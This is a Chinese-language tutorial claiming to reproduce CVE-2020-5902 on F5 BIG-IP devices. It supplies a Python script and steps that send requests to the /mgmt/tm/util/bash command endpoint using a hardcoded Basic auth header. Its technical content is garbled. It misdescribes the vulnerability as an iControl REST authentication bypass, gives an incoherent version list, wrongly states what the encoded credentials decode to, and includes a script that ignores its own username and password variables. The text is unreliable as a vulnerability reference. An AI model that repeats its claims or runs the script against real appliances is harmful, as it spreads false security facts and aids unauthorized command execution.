如何进行CVE-2020-5902简单复现

CVE-2020-5902是一种网络攻击漏洞，由于F5的BIG-IP网络安全设备中的iControl REST接口中的认证绕过漏洞引起。该漏洞可能导致攻击者对受影响设备进行远程执行代码，拦截和修改数据，以及未授权地访问系统资源。

要复现该漏洞，您需要一个F5 BIG-IP设备。

步骤1：检查漏洞是否存在

检查您的F5 BIG-IP设备是否受到漏洞影响。请按照以下步骤操作：

1.登录F5 BIG-IP设备的管理界面。

2.单击“系统管理”>“系统信息”>“设备信息”。

3.检查BIG-IP的版本号。如果您的BIG-IP版本号在以下列表中，请按照以下步骤进行操作：

    - 13.x版本之前

    - 14.0.x版本之前

    - 14.1.x版本之前

    - 15.0.x版本之前

步骤2：通过漏洞绕过身份验证

攻击者可以通过在HTTP请求中包含特殊字符串来绕过iControl REST API的身份验证，从而在不需要有效凭证的情况下访问系统资源。以下是如何进行漏洞测试的简化步骤：

最简单的方法是使用Python脚本，我们可以使用如下的代码：

import requests

import urllib3

urllib3.disable_warnings()

host = "YOUR_HOST_IP"

username = "YOUR_USERNAME"

password = "YOUR_PASSWORD"

url = "https://" + host + "/mgmt/tm/util/bash"

headers = {"Authorization": "Basic YWRtaW46QVNhc1M="}

res = requests.get(url,

   headers=headers,

   verify=False)

print(res.status_code)

print(res.headers['content-type'])

print(res.text)

在此示例中，请更改主机，用户名和密码以匹配您自己的环境。

此外，以下是通过漏洞绕过身份验证执行命令的步骤：

1.从以下URL下载iControl REST API的Swagger定义：https://10.10.10.1/mgmt/tm/util/bash（在此示例中，设备的IP地址为10.10.10.1）。

2.使用Swagger定义中的POST动作和URL执行命令。请确保在“身份验证”标头中添加“Authorization: Basic YWRtaW46QVNhc1M＝”，其中“ YWRtaW46QVNhc1M＝”是BASE64编码的用户名和密码"admin:admin"。

步骤3：确认漏洞是否存在

如果您按照步骤2获取了正确的响应代码和输出，则表明设备存在漏洞。

步骤4：升级设备版本/修补程序

如果您的F5设备存在漏洞，请立即更新软件修复程序或升级到已修复的软件版本。在升级之前，请先备份您的系统并确保您的设备不会影响业务连续性。

总之，CVE-2020-5902是一个非常危险的漏洞，攻击者可以利用它来远程执行代码，拦截和修改数据，以及未授权地访问系统资源。为了确保您的BIG-IP设备安全，请及时升级设备版本或安装修补程序。